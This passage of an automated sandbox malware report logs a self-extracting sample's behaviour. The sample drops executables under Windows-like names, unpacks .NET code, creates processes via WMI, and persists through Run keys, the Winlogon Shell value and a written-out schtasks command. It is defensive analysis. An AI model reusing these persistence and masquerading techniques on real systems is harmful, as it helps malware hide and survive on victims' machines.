                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeDirectory created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeDirectory created: C:\Program Files\Windows Multimedia Platform\8de7bf56f754b7Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeDirectory created: C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeDirectory created: C:\Program Files\Microsoft Office 15\8de7bf56f754b7Jump to behavior
                                Source: H9gMIu2HXi.exeStatic file information: File size 1811992 > 1048576
                                Source: H9gMIu2HXi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: H9gMIu2HXi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: H9gMIu2HXi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: H9gMIu2HXi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: H9gMIu2HXi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: H9gMIu2HXi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: H9gMIu2HXi.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: H9gMIu2HXi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: H9gMIu2HXi.exe, work.exe.0.dr, dwartg.exe.3.dr
                                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.pdb source: SurrogatewebSession.exe, 00000008.00000002.1734602264.00000000036B9000.00000004.00000800.00020000.00000000.sdmp
                                Source: H9gMIu2HXi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: H9gMIu2HXi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: H9gMIu2HXi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: H9gMIu2HXi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: H9gMIu2HXi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                Data Obfuscation

                                barindex
                                .NET source code contains potential unpacker
                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, sgG.cs.Net Code: method_0 System.Reflection.Assembly.Load(byte[])
                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class4.cs.Net Code: H86
                                Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, sgG.cs.Net Code: method_0 System.Reflection.Assembly.Load(byte[])
                                Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Class4.cs.Net Code: H86
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline"
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline"Jump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4597250Jump to behavior
                                Source: H9gMIu2HXi.exeStatic PE information: section name: .didat
                                Source: work.exe.0.drStatic PE information: section name: .didat
                                Source: dwartg.exe.3.drStatic PE information: section name: .didat
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A407F0 push ecx; ret 0_2_00A40803
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A3FEFC push eax; ret 0_2_00A3FF1A
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_003307F0 push ecx; ret 3_2_00330803
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_0032FEFC push eax; ret 3_2_0032FF1A
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_0073F640 push ecx; ret 4_2_0073F653
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_0073EB78 push eax; ret 4_2_0073EB96
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeCode function: 8_2_00007FFD9BABFB02 pushad ; ret 8_2_00007FFD9BABFB03
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeCode function: 8_2_00007FFD9BAB8163 push ebx; ret 8_2_00007FFD9BAB816A
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeCode function: 8_2_00007FFD9BC21EE0 pushfd ; ret 8_2_00007FFD9BC21EE1
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeCode function: 8_2_00007FFD9BC30185 push ebx; retf 8_2_00007FFD9BC301F2
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeCode function: 8_2_00007FFD9BC28951 push 8B485E2Eh; iretd 8_2_00007FFD9BC28956
                                Source: C:\Recovery\winlogon.exeCode function: 43_2_00007FFD9BACFB02 pushad ; ret 43_2_00007FFD9BACFB03
                                Source: C:\Recovery\winlogon.exeCode function: 43_2_00007FFD9BAC8163 push ebx; ret 43_2_00007FFD9BAC816A

                                Persistence and Installation Behavior

                                barindex
                                Creates processes via WMI
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Infects executable files (exe, dll, sys, html)
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile created: C:\Users\user\Desktop\tnEMlbYs.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile created: C:\Recovery\winlogon.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile created: C:\Users\user\Desktop\vybNluDs.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeFile created: C:\Users\user\Desktop\aEtIhTbg.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeFile created: C:\Users\user\Desktop\WslZMRrk.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile created: C:\Users\user\Desktop\MFrsFgjH.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile created: C:\Users\user\Desktop\lKwWBiIK.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile created: C:\Users\user\Desktop\TDfrhvdw.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeFile created: C:\Users\user\Desktop\LdxTVLQK.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile created: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeJump to dropped file
                                Source: C:\Recovery\winlogon.exeFile created: C:\Users\user\Desktop\tRVOBpwv.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile created: C:\Users\user\Desktop\RAtJMMZA.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeFile created: C:\Users\user\Desktop\rGzNBWQu.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeFile created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeJump to dropped file
                                Source: C:\Recovery\winlogon.exeFile created: C:\Users\user\Desktop\BudDliLc.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile created: C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile created: C:\Users\user\Desktop\vybNluDs.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile created: C:\Users\user\Desktop\tnEMlbYs.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile created: C:\Users\user\Desktop\lKwWBiIK.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile created: C:\Users\user\Desktop\TDfrhvdw.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile created: C:\Users\user\Desktop\RAtJMMZA.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile created: C:\Users\user\Desktop\MFrsFgjH.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeFile created: C:\Users\user\Desktop\LdxTVLQK.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeFile created: C:\Users\user\Desktop\BudDliLc.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeFile created: C:\Users\user\Desktop\tRVOBpwv.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeFile created: C:\Users\user\Desktop\rGzNBWQu.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeFile created: C:\Users\user\Desktop\aEtIhTbg.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeFile created: C:\Users\user\Desktop\WslZMRrk.logJump to dropped file

                                Boot Survival

                                barindex
                                Creates an undocumented autostart registry key
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                Creates multiple autostart registry keys
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogonJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SurrogatewebSessionJump to behavior
                                Uses schtasks.exe or at.exe to add and modify task schedules
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogonJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogonJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogonJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogonJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SurrogatewebSessionJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SurrogatewebSessionJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SurrogatewebSessionJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SurrogatewebSessionJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
